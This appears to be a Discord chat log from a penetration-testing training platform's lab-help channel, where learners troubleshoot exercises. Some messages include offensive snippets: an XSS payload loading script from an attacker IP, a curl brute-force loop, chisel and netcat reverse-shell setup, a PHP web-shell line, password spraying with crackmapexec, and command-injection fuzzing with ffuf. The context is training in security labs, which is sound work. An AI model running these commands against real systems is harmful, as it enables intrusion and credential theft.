#modules
well took me 3 hours but i got it wow
i think it is ok even if it takes 2 days, there is no rush in trying to understand and try things
That was a long and exhausting journey, but I managed to finish it
Second assessment was really tough imo
hi,
i use powershell but didnt accept
congrats! you made it! and yes it tough but a pleasant one
brother you blocked out the second output for the rights/ACE
literally the first answer is right there
read the question :)
no im try first answer and secondly answer format word-word
o understand
and it's formatted that way in your screenshot
deleted
as word-word
thank you
that module took me forever
after that is the long desert of web stuff... rummaging with single quotes and one equals eventually to one hu...
Guys!
I am practicing the Zephyr (PRO LAB). I've got the entry point 10.10.110.0/24. When I scan the network, it gives me 2 hosts alive and when I scan those hosts, I find nothing useful.
Please help
anyone please?
Not in this channel
Fine, Suggest the correct one
Read and follow #welcome to access #prolabs-zephyr
Thank you. I was not logged in with my account. I couldn't see it. NVM
Bypassing Encoded References: I'm stuck, I've read through everyone's posts on here about it and still can't figure it out. This is my bash script, can someone help me please.
#!/bin/bash
for i in {1..20}; do
for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "contract=$hash" (target ip)/download.php
done
done
maybe you missed targetip:port?
but there you just changed a number from the course example, you should try to find how the contracts names are formatted and how to get them, it may be another method.
Hey guys, i'm currently doing the Whitebox Attacks Skills Assessment. I've elevated my priv to a user. I'm pretty sure what the next step is but my attack might need some tweaks. Thanks in advance!
Module: INTRODUCTION TO WINDOWS EVASION TECHNIQUES
Section: Process Injection
Hello everyone,
There seems to be a problem with the lab, there is no .exe file being run from C:\Alpha\ProcessInjection. The log.txt doesn't get updated since 7 of may. Is it possible for someone to have a look?
module: cross-site scripting
section: session hijacking
i've loaded my remote scripts and tried every parameter except for password and email and started a nc listening but i dont receive any responses back. Im not sure why
have u tried different type of xss payloads
i think for this section im supposed to use this payload
<script src=http://10.10.14.185:8080/username></script>
where i replace "username" with fullname, or "url" so when it gets sent back to my nc listening i know which parameter is vulnerable?
my ip 10.10.14.185:8080 is the tun0 interface
they also provided with other xss payloads for you to try if one didnt work
ooohh
i changed my vpn and thought the connection was bad now i feel stupid 😭
hi
trying to connect to a target using xfreerdp and a password for the lab in passing the ticket. I am getting what looks like a logon failure due to certificate not matching name of machine
i've tried /cert:ignore and also in case it was due to having previously had a machine with same cert but different ip for a previous lab i also deleted ~/.config/freerdp/known_hosts2 entries
xfreerdp /v:10.129.204.23 /u:Administrator /p:AnotherC0mpl3xP4$$
WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 just a warning
then later
SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
wrap the password in single quotes
This is the actual logon error
The first is just a Warning
got it thx
saved me a lot of time
the logon failure didn't seem to tell me much
it was the SPNEGO that had me confused
Just wrap the password in single quotes
If it's a pass with $$ in it that's the call to the current shell PID
Single quotes tells bash to interpret it as just a string
SPNEGO is just the authentication protocol btw
Hello there are french guys?
Very likely in France there are
Hi, is this the correct way to add a host to RDP? I added it in the part I marked with the blue rectangle and the red rectangle
you don't need to add to your hosts file to rdp
I have the problem to RDP to the user to get the flag for the last question of the module AD, section
Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
I got the user and password but i am unable to access with xfreerdp
are you able to ping the ip?
and also just in case add the single quotes around the password
Yeah i can ping the IP. Already added quotes around the password, the result is the same 😦
Try rdesktop from the attack box or you could maybe dynamic port forward over ssh and try to RDP from your vm?
I had this error today on the AD module also but on an earlier section but I cant remember how I fixed it, wasn't anything special/fancy.
Suddenly worked lol
can i ask something guys,do other ppl have big problem with VPN or its just me?
https://academy.hackthebox.com/module/110/section/1053
currently on this module, and whenever i run the proxychains command on a website it gives me an error
User issue. He deleted a line he wasn’t supposed to
yea im an idiot
PEBCAK
wait no it still doesnt work
I dont speak very good🤣
Lmao

Hi all, sorry if this is a stupid question but, module DACL ATTACKS I, targeted kerberoasting, question 2 asks to use Bloodhound. I'm probably missing something but I can't find the data from an ingestor to upload and use, I just have a blank BH. I've looked into the various folders but nothing. What am I missing?
did you run sharphound or bloodhound.py?
Oh right i somehow thought they were already provided, I did say it was likely a stupid question. Thanks mate!
Module:-INFORMATION GATHERING - WEB EDITION & Section:-DNS zone transfers can someone help after using dig ns with target what i need to do next not able to ping the target
Did you add inlanefreight.htb to your /etc/hosts file?
should i share url?
what do you mean?
its ok i am trying means that command with url which i used
https://academy.hackthebox.com/module/77/section/844
The second question, I can't get it.
I used chmod 600, I copied the private SSH key from id_rsa from target machine to my local machine
I don't know why it's doing that, i'd appreciate if someone could help with this
well, yeah you can post the command you typed. Or anything that could be relevant to help someone help you troubleshooting your issue.
Seems it's just not the second question, but I tried re-connecting back to the machine and now that doesnt work either
I'll try to reset my target.
Seemed like to be a target issue, as I reset the target it got fixed.
no clue why my postgres exploit script isnt working for the skills assessment of the Advanced Sql Injection module. the first query runs, but then none of the other queries run. I set a select pg_sleep(10) after each query to see if it errored out, and only the first query is running. It seems its not able to INSERT
the script ran well for bluebird but its not working for the skills assessment
Is there anyway to reset an answer? With the new information gathering update, it only has me doing the new questions, but the old answers still remain
No
sweet I think I found a work around! It was probably intended im just dumb and took a while to figure it out
learned a lot reading the docs 🙂
Can I have a hint, I'm working on the Advanced XSS and CSRF exploitation module, specifically section "Launching Attacks from the Victim's Session".
I've tried using the reset function with no luck, I suspect that's not the right way as the reset function appears to be disabled.
I also tried exfiltrating the home page (home.php) using the XSS vulnerability but I get nothing on my exfiltration server.
In my payloads I have tried variations with try/catch statements to catch errors but still no luck.
got it 😄 wow this was an awesome module
Take a close look at the page. What exactly do you need to send messages?
Even an admin will need this 😉
Hi, I've just tested the tier 0 modules and found that some of them lack a coherent structure in the sections and some sentences really don't make sense. So I ran the text content of these modules through an AI-generated text detector (https://www.zerogpt.com/fr/) and it appears that they've been totally generated. It's mostly about a certain author, does hackthebox know about this? If so, it's a bit disappointing...
Why it is wrong rephrasing your text using GPT?
And also why do you trust that zerogpt thing? I guess it just checks some rules and flags it as "generated from GPT" and nothing more.
It's not just rephrasing. When I read it, I immediately understood that the text had been generated because of its strange structure, as I see a lot of AI-generated text in my line of work. To confirm this feeling, I simply used this tool as I've been able to confirm in the past that it manages to correctly detect and locate portions of generated text (you can try it with ChatGPT text, it's pretty accurate). The content of these modules is also detected by other systems (for example https://undetectable.ai/ which summarises the results of other detectors). Some parts of these modules may have been conceived by a human, but I strongly recommend that you check them out.
Comrades, good day, I want to ask you this specific question: If I want to practice a lot about the password attack module or another specific topic, does the academy offer this possibility to focus on a topic, whether it is any topic? I appreciate your contribution.
You can practise in a module for as long as you like
I understand but I want to know as such where I can perform it on the machines or is there a specific topic that says passwords attacks or another topic
The Academy itself only provides the modules.
At the end of the modules, machines are often suggested by the main platform that deal with the topic from the module
Hello everyone, which module would you recommend me in order to do Zephyr ? I did the module Ad enumeration & attacks but i have 500 cubes left, i was thinking of the Kerberos module ?
Has anyone else faced this issue or is it just me? When I try to do RDP using Remmina, I get a black blank screen. But when I RDP into the same machine right after, using xfreerdp, I get the GUI.
yes, you could try to press the enter/return key on your keyboard, sometimes it needs a little push
Thanks I will try that
does the output look right when i use the command:
.\EvtxECmd.exe -f "C:\Users\johndoe\Desktop\forensic_data\kape_output\D\Windows\System32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx" --csv "C:\Users\johndoe\Desktop\forensic_data\event_logs\csv_timeline" --csvf kape_event_log.csv
Module : Footprinting
Section : IMAP / POP3
Question : "Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer. "
I don't understand why my answer is not valid, it's written LITERALLY...
Any hint would be appreciated 🤔
Did you add Ltd
Oh god I feel so dumb 
Thanks sir 🙂
No worries 🙂
hey, mind if I pm you now?
INTRODUCTION TO DIGITAL FORENSICS
Rapid Triage Examination & Analysis Tools
Review the file at "C:\Users\johndoe\Desktop\forensic_data\kape_output\D\Windows\System32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx" using Timeline Explorer. It documents the creation of two scheduled tasks. Enter the name of the scheduled task that begins with "M" and concludes with "r" as your answer.
kinda stuck here. i searched in the file for tasks, i filtered Event Record Id for 1, filtered for process creation but haven't found the right answer.
any hint? it feels like it shouldn't be so difficult...
Sure, go ahead.
I'm on my way to work right now, but I'll write you back as soon as I can.

i've not done that module so can't really guide you, but when you say you searched for "task". You mean the word? Did you search for a specific event ID related to scheduled task creation?
i searched for creation, the word task and event id 1 (which should be related to creat a task)
ok, but event ID 1 is process creation... when I google event id scheduled task creation, i see different IDs
i found also 4698 , but either no luck with this one
it feels like it shouldn't be so difficult...
@timber hatch I haven't done the CDSA but, have you filtered in timeline explorer under "Operation"
Hopefully there's an option to filter that by "Scheduled Task", I don't have the evtx file or Timeline Explorer to try it, I'm going off memory
it is probably not, when you have the answer it will seem trivial
you mean a column header with operation? this does not exist
Interesting
What columns do you have available from the evtx log?
I can't re-create your environment so some screengrabs or more detail will help, unless someone who has done it jumps in
uff, a lot.
👀
Are you able to find schtasks.exe in any process listing or the PID for schtasks.exe?
@timber hatch
yes, but also with that i do not find the answer
is there any possibility to search for the name? it begins with "M" and concludes with "r". Something like a wildcard or something ? M*r or some regex? Or filter out stuff you know for sure it will not be, to reduce your search surface?
hey guys can anyone help me with this question??i have been trying for days, thank u in advance
INFORMATION GATHERING - WEB EDITION
Creepy Crawlies
After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.
without giving too much, if you attempt all the techniques shown on the page it will be pretty easy to spot
also may not be super obvious, output needs to be analyzed attentively, especially anything that may refer to comments
is this for me?
no, its about the web
as more obvious hint, have you considered using one of the crawlers/spiders they present ?
i did crawl
tried that also yes
i did python3 ReconSpider.py http://inlanefreight.com
i finished the whole module i only have the one i told u
which where it saves
DM!
Ahoyhoy, still doing the linux fundamentals, but I am becoming sooooo frustrated with linux. Its always "it should work like this" ...." but not in this case". Now I try to put my curl output to a file. curl https... > file.txt , file is always just empty
thanks
Assuming you are not querying something with no results(dont know if possible), if you take a look at the curl help, is there any other flag you could try to signal an output file?
so i used the -o but still nothing 😦
what are you trying to curl?
ohhh I am so dumb the www. got lost in the process >.> thank you ❤️
Hello, trying to complete the Web Request module in HTB Academy. I'm on the HTTP methods - POST at the moment trying to get the flag.
I was able to login with the session ID w/ curl, search the flag via curl, but when I enter it, it keeps saying incorrect.. not too sure if I found the wrong flag...?
I don't know about the process or the wrong flag, but did you check for a starting or trailing space?
Thank you , this worked although I had to remove a word out of the flag
i don't know, i guess if a mod removed your message they would have said something
oh but it disappeared but no one has said anything?
i dont know what happened, i saw your first message but not a module i did, got busy on another screen, came back to see your other message
ahh fair enough just trying to understand the fundamentals of Event Viewer but it appears not many actually do too much with it, I guess I will just have to follow my hunch
yeah... it seems there are less people doing blue team modules, so i guess getting answers could be a bit more uncertain
Comrades, good day. I'm stuck with a question. Module: Attacks on passwords, section: Attacking Active Directory & NTDS.dit. The question is the following:
In a compromise, you have gone to several social media sites and found the names of Inlanefreight employees: John Marston, IT director, Carol Johnson, financial controller, and Jennifer Stapleton, logistics manager. You decide to use these names to carry out password attacks against the destination domain controller. Please submit John Marston's credentials as a response. (Format: username:password, case sensitive)
But I see that when I run the tool I get a build error something like this:
SMB 10.129.202.85 445 ILF-DC01 [*] Windows 10.0 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240208.120203.63438ae7-py3.11.egg/impacket/smbconnection.py", line 278, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240208.120203.63438ae7-py3.11.egg/impacket/smb3.py", line 1040, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The command I run is the following:
crackmapexec smb 10.129.202.85 -u johnmarston -p /usr/share/wordlists/fasttrack.txt
help
format your message with code blocks pls, hard to see the actual output
you can use netexec instead of crackmapexec
Yeah would appear so, going out on a whim I don't suppose you know of any good courses that might cover it?
tx, i'll have a look
Good morning, I would like to ask XXE Advanced File Disclosure why I used the expected payload, but it did not work as expected
guys, it seems that "Information Gathering - Web Edition" is broken after update. Someone was able to get last skill assessment flag?
Question are different, but immutable submitted answers. inlanefreight.htb seems broken. Someone is experiencing same issue?
Thank you I found the problem, I didn't close the content
hello, i got a connectivity problem.
I dont know where to ask
I am doing WINDOWS PRIVILEGE ESCALATION / Windows Server
But i cannot RDP to the server, remmina says unable to connect. I switched to EU 1,4,5 but nothing works.
The answer to one of the modules is wrong
module/77/section/847
netcat returns SSH-2.0-OpenSSH_9.2p1 Debian-2, and it says it's wrong, and when i reveal answer i get that the correct answer is ubuntu
Hey in modules of password attacks, There seems to be a problem with installing crackmapexec on the attack box...
tried installing python3-neo4j from another source and have encountered some problems... :/
you should use the port provided to you
I used chat gpt to debug, now its working
Based on the detailed debug output, it appears that the issue is specifically related to the negotiation of the NLA security layer. The error ERRCONNECT_TLS_CONNECT_FAILED suggests that the TLS handshake is failing. Let's try some additional approaches:
got it. in the example they used 22, so that's why, i thought it's the default port for ssh
Any fix?
use netexec instead
ok thanks
use /tls-seclevel:0
i got it working
so basically netexec is crackmapexec but more up to date??
yep, it's the fork that's being maintained
that's sweet, didnt know that
hi all
AD enum attack module
ACL Section
DcSync Page
i use the secretsdump and output cleartext file but this file is empty
I found my user but the cleartext file is empty and I can't see the user's password
can someone help i even tried fuzzing on this target but still didn't get single 200 how to solve this ..... Module:-ATTACKING WEB APPLICATIONS WITH FFUF & Section:-Sub-domain Fuzzing
fuzzing output
Try using another wordlist?
ok
isn't the answer right there
got it
i think i made blunder by using fuzzing just want to use logic xd but got it
unfortunately i'm not much help since I haven't yet really investigate the defensive side. However searching in my bookmarks I see this Sans Forensics & incident response youtube channel, there might be some good content in there: https://www.youtube.com/@SANSForensics/search?query=event viewer
Modern Web Exploitation Techniques
am I supposed to run the application locally and exploit to get flags ?
or they just gave source code for better understanding
guys, anyone had problem for Attacking DNS? and this question? Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
I have not been able to make any progress and I don't know what I am doing wrong.
which section
SSRF Basic Filter Bypasses
there is target ip but zip file too so i was confused what exactly I have to do
the source is given so that you know how to attack it
some of the things are not really possible to know without the source code
you can target specific users with secretsdump.py
I am doing shells and payloads - the live engagement
The rdp screen is very small and doesnt change resolution.
xfreerdp /v:IP /d:HTB /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
set a fixed resolution e.g. /size:1200x800
I am trying to do a reverse port forward with chisel, to get a reverse shell, back but it's failing
On kali:
kali@kali:~$ chisel server --reverse -p 10001 &
[1] 16168
2024/07/01 11:44:11 server: Reverse tunnelling enabled
2024/07/01 11:44:11 server: Fingerprint lhknR+IHrzzNUTj9GsM9OsLMCkyoujeVStv8/RPzcw4=
2024/07/01 11:44:11 server: Listening on http://0.0.0.0:10001
nc -lvnp 12345
on pivot box
webadmin@inlanefreight:~$ ./chisel client 10.10.15.16:10001 R:55555:127.0.0.1:12345 &
2024/07/01 12:04:27 client: Connected (Latency 41.294889ms)
on target on the remote network, big powershell command fails like this
New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 172.16.5.15:55555"
Anyone got an idea ? In my mind I am telling the pivot box to listen for any connection attempt on 55555 and forward it to 12345 on kali. On powershell I attempt the reverse shell towards the pivot's box internal network IP 172.16.5.15, port 55555
(powershell command is just powershell 1 from reverseshell generator site)
worked, thanks.
I wouldn't use such a high number port, anything above ~49k are dynamic ports
Hey I'm new here Can anyone suggest free resources for ethical hacking?
same outcome with 33333
I can get triple pivot, bind shell on anything but for the love of almighty I cannot get a reverse shell and been trying whole day
shouldn't the revshell connect to port 12345 instead
Hey guys
what to do if I have a chain going on, for example: web site show a lot of directories— Directory Listing Enabled, went to some directory and uploaded a file there, which was not supposed to be— Unrestricted File Upload. How should I make it out in the report?
also the listener is opened at 127.0.0.1 but your powershell is connecting to 172.16.5.15
am I misunderstanding how chisel reverse port forwarding works ? in my mind this tells the client to listen on 55555 and forward everything to the server at 12345
R:55555:127.0.0.1:12345
or is that wrong ?
topology for reference. Ubuntu is the pivot box. The idea is get a reverse shell from server 1 to Kali
it's the other way around
R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol> which does reverse port forwarding, sharing <remote-host>:<remote-port> from the client to the server's <local-interface>:<local-port>.
well I appreciate all the help, but that still did not do it
i think the syntax is for ssh reverse port forwarding too, not chisel
this is taken from the chisel repo
well the github only has the man page of the tool itself as explanations...
idk, for some reason this only works with metasploit, anything manual and it does not work....
yes and it's taken from that
[Update 2020-08-10] Chisel now has a built in SOCKS proxy! I also added a cheat sheet since I reference this post too often. [Original] Having just written up HTB Reddish, pivoting without SSH was at the top of my mind, and I’ve since learned of two programs that enable pivots, Chisel and Secure Socket Funneling (SSF). I learned about Chisel fro...
yeah I read that one, pretty good info for regular pivoting
reverse port forwarding not so much
huh? reverse port forwarding is mentioned
yes, but not for the scenario I am interested in, catching reverse shells. And the CPTS course only show you how to do it with metasploit lol
Thank you, apologies for the delay I went to the gym to try get my mind going lol... that actually looks a really useful channel I know Sans are well regarded
I mean... the concept is the same
You have the reverse point to your listening port
yes, but without a practical example, I am lost
like I could not find anywhere, "ok we established a pivot point with host A, now lets setup a chisel reverse forward to catch a reverse shell from host C"; no content for this
Practice on the double pivot host from the pivoting and port forwarding module
Or the skill assessment
It's what I did to get used to ligolo
it's what I did, double pivot on assessment and is fine. I have setup a small lab with mixed linux windows and practiced triple pivot on it too. I can get a bind shell with all of the machines.
I am pretty sure there's some really good stuff on youtube for chisel examples I want to say john hammond done some stuff, I reviewed that when I was doing some CTF boxes that needed it
thanks a lot, that finally did it for me
@late moth at the first question it says "based on the last result, find out which operating system it belongs to" but it doesn't give me an IP address to scan, and the last result doesn't say anything about operating system
Because it's based on the last example
Hint: TTL is interesting
I can't see anything about operating system in the examples, it only shows echo requests, echo reply, host up, mac address
Yes. TTL is one way to find out an operating system, utilize Google
There's a good handful of Defaults for different base kernels
Hi guys I need some help I just signed up I'm out of date and I need help with memory addresses I used to bof rop and I'm from the 80's please help
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
If it's not related to an academy module, read and follow #welcome to access more channels
dang, you got the answer out quick. I can tell you've looked at that module a couple times lol
It's something I remember looking up
"How to get os info from a ping"
A lot of my stuff is from doing the extra legwork to understand it
ooohh I didn't know that, I just answered now thanks ♡
seems like its paid off.
And spending time here reinforces, if I'm unsure I'll just spin up the lab to be sure I'm not misremembering or my notes are incorrect
After reading the PetitPotam section in the AD Module my brain is about to explode 
it's just ntlm relay 😄
OK, I feel really stupid asking this but I can't find any documentation on this anywhere... How do I encode input with ffuf? I see the '-enc' in the help page, but I don't see any explanation on how to actually use it...
Any advice?
in the image: In place of finding a wordlist with numbers from 0 to 2000, this will send the command output as a wordlist.
... i saved that from a ippsec video, it seems ffuf accepts some bash (?) as wordlist. Or a solution could be encoding payload before sending it to ffuf via a variable as wordlist? Or encode the ffuf output with piping into something.
@wraith pelican 🤔 probably just going to have to pre-encode the word list. I was hoping not to have to mess with it because my shell scripting isn't that strong, but I suppose now is as good a time to brush up on it as any... 🤷
found that
https://github.com/ffuf/pencode
@qui3t Yeah, I found that too, I haven't looked into it, yet. However, it's also on my list of things to at least check out.
@wraith pelican yeah, that sounds like what I'm looking for.
@hexed oyster i just checked the ffuf help,
-enc Encoders for keywords, eg. 'FUZZ:urlencode b64encode' it seems you just need to add which encoding you want after the FUZZ in your command
That or after the FUZZ we can add after the wordlist
@wraith pelican I've tried that and it seems like it breaks. let me try again and verify
this is the command that I know is working now
ttack/os-cmd-execution/inject-whoami.txt":CMD -u "http://94.237.59.63:40239/index.php?to=tmp&from=2380029473.txtDELIMCMD&finish=1&move=1" -replay-proxy "http://127.0.0.1:8080" -fr "\s*Malicious\s+request\s+denied" -H "Cookie: filemanager=gs5v3te0o8hjf3jsu8glvtdj3g" -c -ic -r
change I'm going to make: -w "$HOME/src/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt":DELIM:urlencode
above change caused an error:
see last line of the screenshot
unless I'm misunderstanding what the documentation is saying... entirely possible.
that's a complex command just to check how the encoding works, so much could go wrong : D
this works ffuf -w wordlist.txt:FUZZ -x http://127.0.0.1:8080 -u http://10.10.11.20:3000/#/FUZZ -enc 'FUZZ:b64encode'
@hexed oyster for yeah different FUZZ word you use, you can specify the encoding
OH!!!!
You specify it at '-enc'!
🤦♂️
Thank you.
I don't know why I didn't put that together...
yes flag -enc then the word in single quotes and the encoding type, but i cant find a list of possible encoding at the moment
and thank you too I learned something
Colleagues I am stuck with the question in the password attack module, specifically the Attack Active Directory & NTDS.dit module because at the moment I am executing the command I get an error.
The question is:
In one engagement, he's gone to several social media sites and found the names of Inlanefreight's employees: John Marston, chief IT officer, Carol Johnson, financial controller, and Jennifer Stapleton, logistics manager. You decide to use these names to carry out password attacks against the destination domain controller. Please submit John Marston's credentials as a response. (Format: username:password, case sensitive)
The command I execute is the following:
crackmapexec smb 10.129.38.239 -u names.txt -p /usr/share/wordlists/fasttrack.txt
Did you use a tool like username-anarchy to create the namelist?
If I have created the list, the problem is when I am compiling the crackmapexec I get several errors in the execution
I have the mistake but I don't know how to handle it
I've replied to you couple hours ago to use netexec instead
^
I also used it and I have errors with Netexec is that I think it has to do with impacket
You can't paste images here unless you follow #welcome
And large output often gets blocked by mee6/automod
It's really like 16 lines
ModuleNotFoundError: No module named 'impacket.dcerpc.v5.gkdi'
uninstall the apt version, follow this instead
https://www.netexec.wiki/getting-started/installation/installation-on-unix
use pipx
Thank you friend I'm going to check it out and I'll tell you
Hi everyone, I got a problem with this Q " What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive) ", I already found the password with the tool Lazagne that is FSad... and so on... so the thing is that the answer is not correct... but the tool show me the password of that service WinSCP, so I dont understand what is wrong or what
How am i supposed to know that?
It is from linux fundamentals module
- 1 Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
Did you format it username:password?
For your question: google, plenty of forum answers with commands to give you the answer
I mean, is it how i have to do the course? just to google answer with explanation of the command provided?
i thought it is too easy
For this question, yes
It's the most curveball question
alright, thank you
Most of the rest of the modules require research
But a good portion is given to you
Did you try using it?
i tried
i got a text file but i opened it to find some large amount of text with no mention of "flag"
Well check the options and see what you might need to change to get the /flag.txt file
aight will try that ty ty
The file you retrieved is a common linux file
aight
@next bronze Thank you friend, you have saved me, now I can continue with the questions greetings from a distance
looks like the apt netexec doesn't handle envs properly
Worked!
If it's true, I'll be careful with the facilities from now on @next bronze
hah, I just found out that I don't know how to read... I hate myself for this. (laugh in pain)
well, doesn't work with Bob:FSad***** bruh
Make sure no extra spaces
got a question in SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)
Hello everyone I am stuck on the "Server-Side attacks" module. Specifically the "Nginx Reverse proxy and AJP" (3rd one down). I have commented out the server portion and pasted in what the instructions say but I am getting the following error -->
➜ ~ sudo nginx
nginx: [emerg] invalid host in upstream "http://83.136.252.57:39542/" in /etc/nginx/conf/nginx.conf:37
I have tried the IP and both ports (including 8009) from the spawned target as well as localhost, and 127.0.0.1.
I can supply a copy of my config file if anyone is willing to help out
this is what the question says but none of the timestamps on the graph i made match the description
hi I'm working on the optional challenges on Pass the Ticket from Windows section. I have completed the other challenges using mimikatz to dump tickets and load john's ticket into the existing session. I close the cmd and powershell windows. Then I try to repeat my attacks using rubeus. However before I do so I check if I have access to \DC01\john\john.txt and it seems I have?
shouldn't I lose access to this share since I closed the cmd which i loaded john's TGT into?
the ticket is injected into the current session, it's not limited to a single cmd
if you want to inject fresh tickets, both mimi and rubeus have the function to purge tickets
I'm stuck in the metasploit course at the section modules, as no methods (I've searched a lot on the internet) work. Every time I get Exploit completed, but no session was created. Any help is much appreciated. Thanks :)
can someone help me with reverse shell
i managed to inject php script, i even checked it on the server terminal, i open netcat to listen on the port but when i try to access /access.log through the web page it just is empty as if they do not exist, i am accessing it to lmi vulnerability which is for sure there
provide more info on your msf settings
DM me if you still need help
Still can't run proxychains curl http://SERVER_IP:PORT
so I am in the file upload module. I downloaded the PSUpload.ps1 script onto the windows target machine ran the script in both powershell ISE and a regular powershell CLI. I was only able to run the invoke-fileupload command in ISE. Any ideas why?
import the file
doh, completely spaced that part. Thanks lol
usually you'd just use IEX to load the file directly into the memory instead of downloading a local copy
Whenever i run {proxychains curl {target.ip}} It comes out with "Couldn't connect to server."
HELP 😭
is your proxychains config right
alr these are the two parts i changed as stated in the module
you didn't comment socks4
sometimes i think about life
and what i did to get here
TYSM 😻
hello there, for all that had try the Game Reversing & Modding module, what version of BepInEx work for you ?
thanks in advance 🙂
im stuck on https://academy.hackthebox.com/module/134/section/1175
im following the material but I cannot get it bypass the logon
CPTS>Password Attacks>Attacking SAM: i was able to dump hashes to my pwnbox but i can't get hashcat to output the clear text password. I have also tried outputting to a file to no avail
jk I fixed this - DO NOT run as sudo
Hi
Yeah sudo does funky stuff
its so weird, youd think it would be required for the potential resource cost
Nah
As long as you don't use --force the hashcat gods won't get mad at you
good to know, thanks!
Ok so i thought I fixed it but it didnt.. 😥
https://academy.hackthebox.com/module/110/section/1053
Still on this module, I have burpsuite open, and my FoxyProxy on, but when i ran {proxychains curl 94.237.59.199:52082}, it still came up with Failed to connect. Now i feel like im really doin something wrong.
http://SERVER_IP:PORT
i just tried using that format and I still got the same result
also the target just died so this is a new one
How long does attacking AEN blind shld take?
on the file transfer module. I'm trying to practice uploading files using WebDAV Share. I set up the server on my attackbox and when I try and copy a file over or list the directory using the "DavWWWRoot" to reference the root of the directory it says doesn't exist.
the question is a lot simpler than it sounds. follow the instructions in the section all the way to the end. what's the date that is returning all the events that you see in the visualization?
can you show me your proxychains.conf file
if you dont mind
trying to do the nibbles - initial foothold module and for some reason i am unable to create a php file in my terminal. i tried using metasploit as a workaround but it deleted the image.php file on the server for some reason and now i have no idea what to do. Even if I reset the target ip I still don't know how to fix the "zsh: parse error near \n" message I get when pasting the php system command into the console.
For context I'm doing this via Kali on a VM
Are you sure you didn't crack them already? It says it skipped 4 entries due to already being in the potfile.
So I’m not supposed to look at timestamps??? Cause the all diff
the question was worded in the worst way possible
If you feel that way; #1234357888114364508
hello, what is the command you used to create a file?
I just pasted this into the terminal: <?php system('id'); ?>
By doing that, you are asking your terminal execute the command, but it cannot do that. The course material ask you to save this code to a file.
oh shit that's what vim is for isn't it
: ) yeah
ill do that tomorrow, too tired rn
but you also can ask your terminal to write it to a file without opening vim. Did you do the linux basics module?
no but now i realise i should have
i did try find out how to do it online but couldn't figure it out lol
oh wait i just use the echo command 🤦
yeah
man i love when it turns out the answer to a question was one i figured out hours ago but for some reason it only works on pwnbox and not openvpn
I am hoping someone here can help me. I'm fairly new here and am not sure if this is the right place to ask for help. I am working my way through the Linux Basics module and working on the Navigation exercise. I SSH into the machine like it says, I open a BASH terminal and type cd /home. That puts me in the home directory. I then type ls -la to show all of the files but I'm not seeing a hidden file there that starts with a period. Any ideas to what I'm missing or may be doing wrong?
i doubt that would be the only reason
Working on the File Inclusion module Local File Inclusion section. No matter what path I enter into the url for /etc/passwd it just hangs. Is anyone willing to help me with a sanity check and verify the resource isn't working?
Is this the module
Yes
i found that out because multiple other people here had the same problem
it’s literally the only thing that changed
which module, section, and question is this
you are forgetting who you are. what are you seeing when you ls -la /home ?
i’m not getting into this again
ok
bear with me, im going through it now
my computer is slow and the target takes forever to spawn
I get a file listing of 3 files. cry0l1t3 htb-student mrb3n
those are directories, you can try and explore them
If I follow the module and put /var/www/html it works just fine but not /etc/passwd
AUGH IT'S MY FUCKING VM AGAIN I HAD THE SAME ISSUE WITH REVERSE SHELLS LIKE A WEEK AGO
hm
The file is not in the overall /home directory
Thank you very much. I thought those were files. lol I'm very new to all of this.
yep it works on pwnbox and my debian install but not my kali vm
exact same thing happened with a reverse shell a week ago
i've gotten impacket to stop working because of some shit installed via pip to get other scripts working (certipy), having snapshots helped
did you try the different examples given in the course material?
i need to figure out how to uninstall and reinstall my vm without losing all of the stuff i have on my kali vm
reinstalling tools is not that big of a deal
thank you
Yeah all of them multiple times
windows tools you can zip all of them, put it in a shared folder, then copy back into your new vm
just write down a list of everything you have installed, then reinstall once you spin up a new vm
yeah but i'll lose a bunch of settings and other shit
that's why i have golden images of my VMs so i don't have to think about those
that's why you have whats
golden images
I tried it in the pwnbox and even on my Windows machine same result
you can save your settings separately tbh and reimport if you reaally want to
they are VMs i can copy at any time that have all my tools settings and preferences already set up so i don't have to do entire setup again
I just keep snapshots and keep my vm on a big usb
yeah i take a ton of snapshots, i just wish there was a good way to know when what i'm doing should work and that reverting to a snapshot might fix it
okay well reverse shells still work on my vm
let's see if reverting to a snapshot works
is this one of the "works on pwnbox" but not on the vm moments
classic
haven't had that issue on academy, on usage box though...
it would just really be nice to know when i'm getting it right and it's my vm that's busted
because it turns out the solution was one i tried like hours ago
is your openvpn working, like in logs is it connected, sometimes i need to download a new .ovpn for some reason
i just tried, it works to get /etc/passwd file. Review the course material, you'll find it if you dig maybe a bit deeper
Yeah I got it to work in the pwnbox but still not anywhere else
there is no vpn in this module, it can work from anywhere
update: restoring a snapshot and installing a new ovpn file both did not work
this is a fat fuckin Tomorrow Me Problem
huh usually what fixes it is either new ovpn or swap regions
You would think but nope only the pwnbox is able to do it
